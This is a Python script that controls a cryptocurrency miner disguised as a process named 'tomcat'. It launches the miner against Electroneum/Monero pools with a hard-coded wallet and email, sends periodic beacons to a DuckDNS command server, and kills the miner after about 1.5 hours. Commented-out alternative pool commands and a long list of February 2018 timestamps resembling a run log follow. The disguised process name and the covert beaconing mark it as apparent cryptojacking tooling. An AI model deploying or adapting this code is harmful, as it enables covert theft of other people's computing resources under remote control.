import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:05.092190
#2018-02-17 16:44:07.333351
#2018-02-17 18:33:05.504173
#2018-02-17 20:21:03.687034
#2018-02-17 22:08:05.323245
#2018-02-17 23:52:06.241468
#2018-02-18 01:41:06.256114
#2018-02-18 03:28:03.651197
#2018-02-18 05:15:08.009674
#2018-02-18 07:09:01.694459
#2018-02-18 08:57:03.445182
#2018-02-18 10:44:07.288854
#2018-02-18 12:31:05.756723
#2018-02-18 14:18:06.978386
#2018-02-18 16:09:06.745167
#2018-02-18 17:58:05.618722
#2018-02-18 19:45:04.729957
#2018-02-18 21:31:05.363907
#2018-02-18 23:19:04.041722
#2018-02-19 01:07:04.744568
#2018-02-19 02:53:06.629039
#2018-02-19 04:41:07.978293
#2018-02-19 06:25:08.580857
#2018-02-19 08:14:07.953089
#2018-02-19 10:04:01.840265
#2018-02-19 11:53:01.925038
#2018-02-19 13:39:01.317022
#2018-02-19 15:26:03.968500
#2018-02-19 17:14:06.383666
#2018-02-19 19:02:06.376214
#2018-02-19 20:47:08.141711
#2018-02-19 22:35:08.164421
#2018-02-20 00:20:02.468160
#2018-02-20 02:08:03.855433
#2018-02-20 03:58:04.422978
#2018-02-20 05:41:04.824440
#2018-02-20 07:27:07.184945
#2018-02-20 09:12:08.280564
#2018-02-20 10:55:09.077774
#2018-02-20 12:43:10.733932
#2018-02-20 14:29:05.692147
#2018-02-20 18:28:05.166633
#2018-02-20 21:15:08.122224
#2018-02-20 23:52:06.645080
#2018-02-21 02:28:04.241801
#2018-02-21 05:15:05.168746
#2018-02-21 07:58:06.500822
#2018-02-21 11:01:05.101072
#2018-02-21 12:48:13.909238
#2018-02-21 14:36:01.363691
#2018-02-21 16:22:08.883545
#2018-02-21 18:13:05.474230
#2018-02-21 19:58:07.800693
#2018-02-21 21:45:08.948605
#2018-02-21 23:33:05.651335
#2018-02-22 01:19:07.656622
#2018-02-22 03:08:07.219411
#2018-02-22 04:53:06.325549
#2018-02-22 06:38:06.128511
#2018-02-22 08:26:04.100479
#2018-02-22 10:13:08.189145
#2018-02-22 11:59:04.012198
#2018-02-22 13:45:03.507733
#2018-02-22 15:32:04.902350
#2018-02-22 17:18:04.313594
#2018-02-22 19:05:08.704393
#2018-02-22 20:58:05.796237
#2018-02-22 22:44:05.916800
#2018-02-23 00:31:07.129075
#2018-02-23 02:18:02.144662
#2018-02-23 04:07:04.422179
#2018-02-23 05:53:07.342797
#2018-02-23 07:43:06.453737
#2018-02-23 09:47:04.700499
#2018-02-23 11:52:07.512176
#2018-02-23 13:41:01.504401
#2018-02-23 15:28:08.818343
#2018-02-23 17:17:01.762122
#2018-02-23 19:01:11.192413
#2018-02-23 20:47:06.857789
#2018-02-23 22:31:04.087182
#2018-02-24 00:17:05.275362
#2018-02-24 02:08:07.215194
#2018-02-24 03:57:07.607038
#2018-02-24 05:43:02.203986
#2018-02-24 07:34:06.379430
#2018-02-24 09:20:08.540354
#2018-02-24 11:14:03.233509
#2018-02-24 13:03:05.416963
#2018-02-24 14:51:01.723391
#2018-02-24 16:42:07.863456
#2018-02-24 18:31:06.516199
#2018-02-24 20:17:07.275955
#2018-02-24 22:10:04.357769
#2018-02-25 01:07:07.245924
#2018-02-25 03:58:04.632722
#2018-02-25 06:42:03.807016
#2018-02-25 11:36:04.584541
#2018-02-25 13:26:01.225633
#2018-02-25 15:02:01.591334